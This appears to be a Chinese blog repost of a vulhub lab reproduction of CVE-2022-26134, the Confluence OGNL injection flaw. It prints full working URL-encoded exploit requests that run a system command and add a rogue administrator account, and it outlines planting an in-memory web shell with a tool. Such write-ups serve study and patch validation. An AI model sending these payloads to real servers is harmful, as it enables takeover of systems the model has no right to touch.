码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • CVE-2022-26134 Confluence OGNL表达式注入命令执行漏洞复现



    目录

    漏洞相关介绍

    漏洞类型

    影响版本

    漏洞复现

    漏洞环境

    复现过程

    下载vulhub搭建

     申请license

    初始化过程 ​编辑

     初始化空间

    复现POC

    rce

     加账户

    武器化

    内存shell

    加账户


    漏洞相关介绍

    漏洞类型

    命令执行

    影响版本

    Confluence Server and Data Center >= 1.3.0
    Confluence Server and Data Center < 7.4.17
    Confluence Server and Data Center < 7.13.7
    Confluence Server and Data Center < 7.14.3
    Confluence Server and Data Center < 7.15.2
    Confluence Server and Data Center < 7.16.4
    Confluence Server and Data Center < 7.17.4
    Confluence Server and Data Center < 7.18.1

    漏洞复现

    漏洞环境

    vulhub  Confluence Server 7.13.6

    复现过程

    下载vulhub搭建

    docker-compose up -d

     申请license

    访问:本地8090端口,点击申请license

    默认勾选datacenter

     跳转,默认勾选

     填写完毕后

    这里选择应jdbcurl连接,host为db,账号密码均为postgres

     

    初始化过程

     这里出现两个勾选项目:1 设置管理员账户密码  2 连接到Jira

     Next,of

     初始化空间

    复现POC

    rce

    以下为poc

    1. GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
    2. Host: 192.168.0.104:8090
    3. Accept-Encoding: gzip, deflate
    4. Accept: */*
    5. Accept-Language: en
    6. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    7. Connection: close
    8. Content-Length: 2

     加账户

    /%24%7B%23this.getUserAccessor%28%29.addUser%28%27httpvoid%27%2c%27pwn@1234%27%2c%27pwn@httpvoid.com%27%2c%27HttpVoid%27%2c@com.atlassian.confluence.util.GeneralUtil@splitCommaDelimitedString%28%22confluence-administrators,confluence-users%22%29%29%7D/
    

    数据包:

    1. GET /%24%7B%23this.getUserAccessor%28%29.addUser%28%27httpvoid%27%2c%27pwn@1234%27%2c%27pwn@httpvoid.com%27%2c%27HttpVoid%27%2c@com.atlassian.confluence.util.GeneralUtil@splitCommaDelimitedString%28%22confluence-administrators,confluence-users%22%29%29%7D/
    2. HTTP/1.1
    3. Host: 192.168.0.104:8090
    4. Accept-Encoding: gzip, deflate
    5. Accept: */*
    6. Accept-Language: en
    7. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    8. Connection: close
    9. Content-Length: 2

    当前用户

    执行以上poc后,退出当前用户

    被增加的账户名和密码:

    httpvoid

    pwn@1234

    武器化

    内存shell

    使用 woodpecker工具以及深蓝大佬写的武器化插件

     

    扫描探测,勾选send to poc

     后利用,勾选send to Exploit,选择CVE-2022--26134,执行exploit

    连接shell,jsp类型

     

    加账户

  • 相关阅读:
    return 0 和 return true 是什么意思
    halcon算子3、emphasize
    【DSP】【第五篇】RBL源代码分析
    2023年tiktok自动化运营软件新排名看这里!
    【SA8295P 源码分析 (一)】33 - Android GVM USB 透传配置
    Nautilus Chain上线主网,为DeFi和流支付的未来构建基础
    String常用方法归纳 & StringBuilder拓展——火速收藏!!!
    微信截图不能截微信界面
    【英语:基础高阶_经典外刊阅读】L2.阅读理解必备技能—词义推测
    【AI原理解析】— GPT-4o模型
  • 原文地址:https://blog.csdn.net/qq_38376348/article/details/125459671
  • 最新文章
  • 沪漂五周年了:我越来越迷茫了
    Agentic Skill Routing 实战:别再把所有 Skill 塞进 AI Agent 上下文
    MySQL-Seconds_behind_master的精度误差
    [MAF预定义ChatClient中间件-03]CachingChatClient——利用缓存省钱省时间
    AI的至暗历史:从万众期待到被政府撤资,AI的两次死亡徘徊
    Agent OS :五种驯服不确定性的范式
    PortSwigger SQL注入LAB11
    数据库即时编译JIT
    [Begin]AI Learn Data Day 0
    深度学习进阶(二十七)现代 LLM 的核心架构设计其二:SwiGLU
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号